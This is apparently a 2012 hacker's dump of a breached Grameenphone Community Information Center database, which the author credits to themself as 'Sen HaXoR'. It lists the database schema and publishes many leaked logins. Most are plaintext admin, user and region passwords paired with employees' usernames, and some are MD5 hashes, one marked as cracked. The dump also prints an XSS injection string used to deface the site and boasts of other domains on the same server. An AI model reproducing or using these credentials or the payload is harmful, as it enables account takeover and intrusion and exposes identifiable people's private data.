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Uninor Bangladesh GPCIC Database Hacked By Sen HaXoR

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Oct 20th, 2012
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  1. ================================================================================================
  3. -------------------------------| Target : |-----------------------------------
  4. --| UNINOR BANGLADESH - GPCIC: Grameenphone Community Information Center Hacked By Sen HaXoR |--
  6. ================================================================================================
  7. [#] - Database Dumped By Sen HaXoR _|_
  9. Table Name Columns
  10. account cic_code cic_user cic_pass
  11. account_main_income_type main_cat_id main_cat_name
  12. account_main_outflow_type outflow_cat_id outflow_cat_name outflow_period flag
  13. account_sub_categories main_id sub_cat_id sub_cat_name flag
  14. accounts_admin admin_name admin_password
  15. accounts_income sub_cat_id cic_user selected_date value_taka submit_date
  16. agreement agreement_date expiry cic_code
  17. ams_cellbazar_ans qid answer cic_code selected_date submit_date
  18. ams_cellbazar_ques qid question flag serial_id
  19. ans_faq ans_id ans_bangla ans_eng topic_id
  20. answers ques_id ans_id ans
  21. basic_pages page_id page_name_english page_name_bangla page_content_english page_content_bangla
  22. bill_pay code_company id_transaction code_category id_distributor name_distributor id_retailer name_retailer msisdn_retailer account_no bill_no tariff location_code zone area category total_bill total_vat bpdb_amount stamp_fee net_payment_gov net_payment_pdb gp_amount day_transaction
  23. bill_pay 020209 name_retailer month name_distributer date_transaction company_code id_transaction id_customer account_customer msisdn_customer account_entrepreneur msisdn_retailer loc_code bill_number tariff total_amount date_dumping
  24. bill_reg id_customer id_company account_customer msisdn_customer date_created msisdn_retailer account_entrepreneur date_dumping
  25. cash_queries query_id query_date query
  26. cash_results query_id col1 col2 col3 col4 col5 col6 col7 col8 col9 col10 col11 col12 col13 col14 col15 col16 col17 col18 col19 col20 col21 col22 col23 col24 col25 col26 col27 col28 col29 col30 col31
  27. cc_email agent_name agent_email cm_name cm_contact cic_code cic_contact priority problem description date_time cc_mail_id emp_id
  28. channel cic_code cell_id bcch rx_lev ne_bccha ne_bcchb ne_bcchc ne_rxleva ne_rxlevb ne_rxlevc longtitude latitude fpdch comments
  29. cic cic_code upazilla_id entrepreneur_id serving_cell type_of_launch launching_date formal_date edge_check facility_check dimension cic_address inside_gpsd
  30. cic_computers cic_code week_id no_computers
  31. cic_customer_tracking cic_code report_date submit_date tot_male_cust tot_female_cust
  32. cic_distribution admin_name cic_code
  33. cic_edge_usage mobile_no connection_date report_date tag hour_no no_of_calls data_volume air
  34. cic_ext cic_code upazilla_id entrepreneur_id serving_cell type_of_launch launching_date formal_date edge_check facility_check dimension cic_address inside_gpsd remark
  35. cic_gallery gallery_id image_id image desc_english desc_bangla
  36. cic_gallery_menu gallery_id parent_id gallery_name_english gallery_name_bangla gallery_desc_english gallery_desc_bangla hits
  37. cic_helpers cic_code week_id no_helpers
  38. cic_map_gpsd division_name district_name upazilla_name upazilla_id gpsd_no gpsd_name gpsd_address resp_person gpsd_contact entrepreneur_name cic_code contact_number e_mail cic_address
  39. cic_problem_types problems
  40. cic_revenue cic_code week_id no_of_male no_of_female most_used_service least_used_service most_requested_service rev_comp_internet rev_comp_noninternet rev_flexiload rev_pco rev_others reporting_date year
  41. cic_services cic_service_id cic_service_name
  42. closed_cic cic_code closing_date flexi_returned flexi_return_date gppp_returned gppp_return_date wan_returned wan_return_date shopsign_return shopsign_return_date marketing_return marketing_return_date remarks
  43. cm_excel gpsd_no tc hw sw inc ins others date
  44. content sub_link_id type content_bangle content_english reference content_id main_link_id feed_back_count feed_back_point
  45. contents page_item_id content_id content_title_bangla content_title_english content_bangla content_english url content_image hits
  46. custinfo msisdn custcode cic_id name token
  47. custinfo1 msisdn custcode cic_id name token
  48. data_sheet cust_mob_no month_of_connection date incoming_outgoing_tag hour no_of_calls data_volume air
  49. demo id ques ans1 ans2 ans3 ans4
  50. directory_images id cic_code id_hide id_serial image img_desc time2add
  51. directory_info id cic_code services event time2add
  52. directory_services id id_hide id_serial service time2add
  53. distribution distr_item distr_date distr_qty remarks
  54. district division_id district_id district_name
  55. division division_id division_name
  56. edge_no mob_no
  57. ehealth_doctors id name_first name_middle name_last sex designation time2add
  58. ehealth_login id id_bar id_who id_doc username password time2add
  59. ehealth_menu id id_hide id_serial attribute menu time2add
  60. ehealth_patient id prefix name address dob sex marital problem time2add
  61. ehealth_patient_history id id_patient id_qtab answer time2add
  62. ehealth_pool id id_patient id_doc status time2add
  63. ehealth_prescription id id_pool id_doc prescription time2add
  64. ehealth_qtab id id_hide id_serial qtext time2add
  65. ems_post_act id post_act_type time2add id_hide id_serial
  66. ems_post_act_cic id cic_code id_post_act date_from date_to remark activation emp_id date2add
  67. ems_query id_qry qry_name qry_brief qry_text qry_group id_hide id_serial time2add
  68. enterprener User_name password name area thana dist address mobile User_no
  69. entrepreneur upazilla_id entrepreneur_id entrepreneur_name entrepreneur_address contact_number e_mail type remarks status
  70. essay_accesslog id logintime ip
  71. essay_file id fileinfo filesubmit
  72. essay_student cic_code id pwd name fname mname village union1 po upazilla district division gender bday class institute hobby aim time2reg submit_done phone
  73. executive_issue_type type_id type
  74. executive_issues type_id issue
  75. external_mail mail_id rand_id mail_date sender receiver
  76. fate user_id seq_id ques_id submitted_ans_id
  77. feedback sender sender_mail phone_no date comment
  78. flexi_all mob_no
  79. flexi_db cic_code distributor_name distributor_address request_date flexi_no
  80. flexi_new mobile_no
  81. flexi_usage mobile_no reporting_date reporting_hour no_of_recharge amount_of_recharge
  82. fm_users fm_user fm_pass
  83. general_hits url hits
  84. gppp_all mob_no
  85. gppp_usage connection_date mobile_no report_date hour_no tag no_of_calls data_volume charge
  86. gpsd_excel gpsd_no gpsd_name gpsd_address gpsd_district gpsd_thana division resp_person gpsd_contact
  87. green_alloc user siteid
  88. green_ans siteid user qid answer time
  89. green_qdb qid qtext
  90. guest guest_name guest_pass
  91. hbbar 251108 msisdn valid_from valid_to valid_flag load_date
  92. healthline calling_number called_number hour_band duration charge district region date_call date_dumping
  93. hit_counter count
  94. home_side_menu side_menu_id menu_name_bangla menu_name_english menu_content_bangla menu_content_english url image mouseover_image hits
  95. hot_b_bar 251108 validation_date mobile_no
  96. hotbbar msisdn valid_from valid_to valid_flag load_date dumping_date
  97. hotbbar 251108 msisdn valid_from valid_to valid_flag load_date dumping_date
  98. idea_form name e_mail contact idea_1 idea_2 idea_3
  99. income_log cic_code report_date submission_period sub_cat rate service_no male_cust female_cust total_income
  100. invoice release_date month mobile_no custcode status security invoice prv_1st prv_2nd prv_3rd prv_4th
  101. invoice_from msisdn bill_month_start
  102. invoice_old release_date mobile_no custcode status security invoice prv_1st prv_2nd prv_3rd prv_4th
  103. invoice_old110508 month mobile_no custcode status security invoice prv_1st prv_2nd prv_3rd prv_4th
  104. item Item_name
  105. kormo_dot_net cic_code kormo_user kormo_pass bar
  106. kormo_dot_net_rename cic_code kormo_user kormo_pass
  107. lifecycle_users user_name emp_id user_pass user_prev div_prev token team_id gp_alias alias_name
  108. log_book user_name user_query date_time
  109. login_log id first_login page1_submit page2_submit page3_submit page4_submit
  110. mail_box sender receiver subject mail send_date attachment read_or_not mail_no
  111. main entry_id cic_code cat_id report_date submit_date remarks cost duration period
  112. main_menu menu_id menu_bangla menu_english menu_desc_bangla menu_desc_english
  113. main_navigation menu_id sub_menu_id
  114. manual manual_file manual_name manual_beng manual_file_beng file_id
  115. matrix_users user_name usage_criteria revenue_criteria usage_duration revenue_duration usage_matrix revenue_matrix usage_analyzer revenue_analyzer dashboard
  116. media_releases news_id news_title news news_source
  117. monitoring_months monitoring_month monitoring_year
  118. months month_no month_name
  119. new_bulletin date_submit new_eng new_beng date_bangla
  120. new_entre name e_mail contact upazilla_id
  121. next_code next_cic_code
  122. notice_board notice_id notice_title_english notice_title_bangla notice_brief_english notice_brief_bangla notice_description_english notice_description_bangla reference notice_image hide_id
  123. old Division District Upazilla Contact_name Contact_address Contact_phone Contact_email Contact_phone2 Contact_email2 remarks ind_org cv_available ent_ident ent_selected site_identified facilities training launch sim_distr edge_check serving_cell inside_gpsd dimen cic_no launching_date expected_date
  124. ones upazilla_id gpsd_no
  125. org_hits_history hit_date client_ip hits
  126. page_item sub_menu_id page_item_id page_head_bangla page_head_english page_desc_bangla page_desc_english
  127. participation entrepreneur_id training_completed session_id Operator_name
  128. payment msisdn date payment_amount payment_type status
  129. pco_db cic_code sim_no imei_no activation_date
  130. period_month month_id month_name
  131. period_random random_id random_name random_value
  132. period_year year_id year_name
  133. pfn_accesos id login ip estado donde session data ultimo
  134. pfn_arquivos id arquivo id_directorio
  135. pfn_arquivos_campos_palabras id_arquivo id_campo id_palabra
  136. pfn_bloqueo_ip ip
  137. pfn_campos id campo
  138. pfn_configuracions id conf vale
  139. pfn_configuracions_datos campo valor id_conf
  140. pfn_directorios id directorio id_raiz
  141. pfn_grupos id nome id_conf estado
  142. pfn_palabras id palabra
  143. pfn_raices id nome path web host estado mantemento peso_maximo peso_actual
  144. pfn_raices_grupos_configuracions id_raiz id_grupo id_conf
  145. pfn_raices_usuarios id_raiz id_usuario
  146. pfn_sesions id tempo contido ip
  147. pfn_usuarios id nome usuario contrasinal contrasinal_tmp email estado admin id_grupo mantemento descargas_maximo cambiar_datos
  148. pma_bookmark id dbase user label query
  149. pma_column_info id db_name table_name column_name comment mimetype transformation transformation_options
  150. pma_designer_coords db_name table_name x y v h
  151. pma_history id username db table timevalue sqlquery
  152. pma_pdf_pages db_name page_nr page_descr
  153. pma_relation master_db master_table master_field foreign_db foreign_table foreign_field
  154. pma_table_coords db_name table_name pdf_page_number x y
  155. pma_table_info db_name table_name display_field
  156. presentations file_id slide_id image_eng image_beng
  157. public_exam_result_2007 name roll_no result_details board xxam year
  158. ques_faq ques_id ques_bangla ques_eng topic_id
  159. questions ques_id ques correct_ans_id
  160. readiness ready_id computer_setup marketing gpcic_shop business equipment setup_bangla marketing_bangla shop_bangla business_bangla equipment_bangla
  161. receive receive_item receive_date receive_qty remarks
  162. region_users user_full_name region_user region_email region_pass region_mobile division
  163. report_ans id emp_id team_id p1 p2 p3 p4 p5 time2add
  164. result_log cic_code board roll_no time serial
  165. rollout_ans qid sub_id ans user_id time2add
  166. rollout_ans 090209 qid sub_id ans user_id time2add
  167. rollout_ans 260209 qid sub_id ans user_id time2add
  168. rollout_correct qid ans eye
  169. rollout_correct 090209 qid ans eye
  170. rollout_correct 260209 qid ans eye
  171. rollout_examinee id pwd name_first name_last phone time_reg
  172. rollout_examinee 090209 id pwd name_first name_last phone time_reg
  173. rollout_examinee 260209 id pwd name_first name_last phone time_reg
  174. rollout_qdb qid question hide_id serial_id time2add
  175. rollout_qdb 090209 qid question hide_id serial_id time2add
  176. rollout_qdb 260209 qid question hide_id serial_id time2add
  177. rollout_qdb_sub qid sub_qid serial_id hide_id sub_ques sub_qtype time2add
  178. rollout_qdb_sub 090209 qid sub_qid serial_id hide_id sub_ques sub_qtype time2add
  179. rollout_qdb_sub 260209 qid sub_qid serial_id hide_id sub_ques sub_qtype time2add
  180. server_variables variable_name value
  181. site_map site_map_id page_name_english page_name_bangla url
  182. solve_time cc_mail_id date_solved start_date solved_by problem_type
  183. status_meaning status status_name
  184. sub_link_list main_link_id sub_link_id content_bangla content_english
  185. sub_menu sub_menu_id sub_menu_bangla sub_menu_english hits sub_desc_bangla sub_desc_english
  186. success_story story_id cic_code ent_name_english ent_name_bangla cic_location_english cic_location_bangla story_english story_bangla story_image
  187. support_content id id_content id_hide id_serial link_title_english link_title_bangla link_detail_english link_detail_bangla tag image hits time2add
  188. support_content_image id id_hide id_serial image time2add
  189. support_content_rating id id_content cic_code rating time2add
  190. support_hits support_hits_value
  191. support_navigation id id_hide id_serial id_parent id_child link_title_english link_title_bangla link_detail_english link_detail_bangla file_name image hits date_update
  192. support_suggestion id_suggestion suggestion type time2add
  193. survey_ans qid sub_qid ans cic_code time2add
  194. survey_ans 070409 qid sub_qid ans cic_code time2add
  195. survey_misc_text id id_hide id_serial label text_bangla time2add
  196. survey_qtab_main qid serial_id hide_id ques time2add
  197. survey_qtab_main 070409 qid serial_id hide_id ques time2add
  198. survey_qtab_sub qid sub_qid serial_id hide_id sub_ques sub_qtype time2add
  199. survey_qtab_sub 070409 qid sub_qid serial_id hide_id sub_ques sub_qtype time2add
  200. team_definition team_id team_name hide_id time2add
  201. temp_gpsd gpsd_code gpsd_name gpsd_address district thana csc_supervisor responsible_person contact_number division_name
  202. temp_sim_no mob_no
  203. topic_troubleshoot topic_id_tro topic_name_eng topic_name_bang
  204. topics_faq topic_id topic_name_bang topic_name_eng
  205. trainers emp_id trainer_name designation mobile_no
  206. training_session session_id session_venue start end
  207. trains_in emp_id session_id
  208. tro_check problem_id check_eng check_bangla
  209. tro_problem topic_id_tro problem_eng problem_bangla problem_id
  210. type_meaning type_of_launch type_name
  211. uncovered division district upazilla upazilla_id
  212. upazilla district_id upazilla_id upazilla_name
  213. update_time cc_mail_id update update_time
  214. urgent_links link_id link_text_english link_text_bangla url hide_id serial_id date2add
  215. url_web_history url report_date hits
  216. user id passwd name f_name m_name vill union p_office upazilla district division cic_code gender birth_date class school_name hobby aim comp_use internet_use cic_visit last_submission
  217. user_admin user_name user_pass type
  218. users user_name user_pass user_division upload_count
  219. visitor visitor_name visitor_feedback visitor_email visitor_phn
  220. wan_all mob_no
  221. wan_db cic_code sim_no imei_no activation_date
  222. wan_db_ext cic_code sim_no remark
  223. web_history url_id report_date hits
  224. weeks week_id start_date end_date year
  226. [#]- Admin Login Info :
  228. admin_name admin_password
  229. Apu gpcic
  230. Farzana flexigpcic
  231. Fuad gpcic
  232. Mahi gpcic
  233. mejbah P!$c#$
  234. Nasir gpcic
  235. Rajib gpcic
  236. Roni gpcic
  237. sanat t!ger
  238. Shahadat shahadat
  239. shihab gpcic
  240. Sikdar gpcic
  241. shohel gpcic
  242. Tahkik gpcic
  243. Tonmoy gpcic
  244. Oli gpcic
  245. sujan sujan
  247. Table: user_admin
  249. user_name user_pass
  250. sharmin_not_valid gpcic123
  252. [#]- Ehealth login Info :
  254. username password
  255. mejbah 1dbc4fda760aafa17868aeedc4bbf75e
  256. tahkik 1dbc4fda760aafa17868aeedc4bbf75e
  257. cic00157 1dbc4fda760aafa17868aeedc4bbf75e
  258. zillur 1dbc4fda760aafa17868aeedc4bbf75e
  259. sanat 1dbc4fda760aafa17868aeedc4bbf75e
  261. Password Hash ( 1dbc4fda760aafa17868aeedc4bbf75e ) cracked : gpcic
  263. [#]- fm_users Info :
  265. fm_user fm_pass
  266. sujan R@nd0m!z#
  267. mejbah m1e3j7b2ah
  268. shohel gpcic
  270. [#]- Guest Login info :
  272. guest_name guest_pass
  273. hasan_gopalpur 1dbc4fda760aafa17868aeedc4bbf75e
  274. liaqat_bhuapur 1dbc4fda760aafa17868aeedc4bbf75e
  275. manzur 1dbc4fda760aafa17868aeedc4bbf75e
  276. michael 1dbc4fda760aafa17868aeedc4bbf75e
  277. sanjoy 1dbc4fda760aafa17868aeedc4bbf75e
  278. sikdar 1dbc4fda760aafa17868aeedc4bbf75e
  279. tasnuva 1dbc4fda760aafa17868aeedc4bbf75e
  281. [#]- lifecycle_users Login info :
  283. user_name user_pass
  284. apu d9f6e636e369552839e7bb8057aeb8da
  285. fuad_rename 1870191f5d1471b292c559c478f5866a
  286. mahfuz a33f5792b2a9a51ddd0111b3ac6e0e76
  287. sanat 6d584275cddaca779560a6c0a46ac90a
  288. mahbub 027f210a8fe7b893ff4d95660896be0f
  289. sikdar 17548c7b35f33a398b56294f7701a478
  290. oli 1dbc4fda760aafa17868aeedc4bbf75e
  291. shihabul c24abf565331c4830e08e11f8a5a4d27
  292. yahya 1dbc4fda760aafa17868aeedc4bbf75e
  293. farzana 3a786869223eddf7768e16069686e5b2
  294. mejbah 7dbe349ea774016e16e794b31b7ec4bf
  295. sreza 4e7edc55615b428af2637e1a2b785b1b
  296. rajib**** b3ebcd486e7f266b4b8d1d3936fd243f
  297. nasir 681091d5fafa11aa629b476eee8f92af
  298. didar_not_valid 1dbc4fda760aafa17868aeedc4bbf75e
  299. ali 6614fd9021c9e4486a5693d69ca9b5a7
  300. shohel 1dbc4fda760aafa17868aeedc4bbf75e
  301. m_shahadat e024dc889ba8d396b23e524f677f2aab
  302. akhtar 38a2b3d51d51366c342d0986f2065216
  303. muid b47bc9c3971a24ddbbfd211d7b692227
  304. salahuddin 25926ca065ad0a5a2127b4a495a90a82
  305. sujan f379eaf3c831b04de153469d1bec345e
  306. mahi 80c9ef0fb86369cd25f90af27ef53a9e
  307. tahkik 1dbc4fda760aafa17868aeedc4bbf75e
  308. report 1dbc4fda760aafa17868aeedc4bbf75e
  309. shahadat 1dbc4fda760aafa17868aeedc4bbf75e
  310. rusho*** 1dbc4fda760aafa17868aeedc4bbf75e
  311. barnali 91b6014b70dda7eb0a4a797599343722
  312. tanveer*** 1dbc4fda760aafa17868aeedc4bbf75e
  313. thanbir 570fe4c5a075ba96672551dc71448d20
  314. rahat 58f764aea5e86b2d1afc0ca684369f9d
  315. tonmoy e10adc3949ba59abbe56e057f20f883e
  316. arefin f30aa7a662c728b7407c54ae6bfd27d1
  317. jahir 0c00be00af6c65353b116613b4d1578a
  318. jafar 25a1b2bb4f19703fb7df22c5dbc2c609
  319. rubaba 1dbc4fda760aafa17868aeedc4bbf75e
  320. gmosharraf 8688ef3c7b9abb93a00eb3a6c3f55249
  321. shams 40be4e59b9a2a2b5dffb918c0e86b3d7
  322. mahmudun 7ae86066b11de8305146478127046d1a
  323. oliahmed cee68db13cba4b1c766e56ca9120c65c
  324. m_monwarul dbfdf24d5b54ac494f3b9097b495c63e
  326. [#]- Region_users Login info :
  328. region_user region_email region_pass
  329. ziaul.haider ziaul.haider 8791
  330. r_das r_das rajmil07
  331. kmahmood kmahmood rifat
  332. zkabir zkabir 192724
  333. k_mushfiqur k_mushfiqur 41921
  334. s_sharmin s_sharmin 43009
  335. tachowdhury_200409 tachowdhury 321978
  336. Abul_hossain Abul_hossain 42951
  337. Mobassherul Mobassherul 21512
  338. deashis.pal deashis.pal 21541
  339. m_haque m_haque 41904
  340. m_monwarul m_monwarul Apr@2009
  341. muid muid Bangladesh
  342. mejbah mejbah.uddin mejbahuddin
  343. test region test1234
  344. sharmin.ahmed_cancel sharmin.ahmed gpcic32165
  345. oliahmed oliahmed oliahmed7445
  346. Sujan sujan.das gpcic
  347. mahbub_200409 mahbubulalam malam
  348. m_kamruzzaman m_kamruzzaman ss111sony
  350. [#]- Users Login info :
  352. user_name user_pass
  353. ifti_not_valid 6p616
  354. michael_not_val gpcic
  355. reza gpcic
  356. s_kumar gpcic
  357. m_maula gpworld
  358. tasnuva $y$tem
  359. zakaria gpcic
  360. sikder gpcic
  361. sharmin_not_val gpcic
  362. mostafiz gpcic
  363. nasir freewill_13
  364. farzana cicgp
  365. sanat sanat
  366. admin_not_valid ifti123
  367. sharmin_not_val ifti123
  368. user_not_valid user
  370. ============================================================================================
  372. Xss Hacked Link :<h1><b><center><font color="white">Sen HaXoR</b></font></center></h1><p><center><font size="4"><b>Uninor Bangladesh Hacked By Sen HaXoR</p></center></b></font>&page_id=1
  374. ============================================================================================
  376. List of other Sites Hosted on Same Server :
  378. Found 10 domains hosted on the same web server as (
  400. =============================================================================================
  402. -------------------------------| SEN HAXOR 0wn3Z YOU | ------------------------------------
  404. -----------| Love To : Vaishu and Striker India , Greetz : All Indian Hackers | -------------
  406. =============================================================================================
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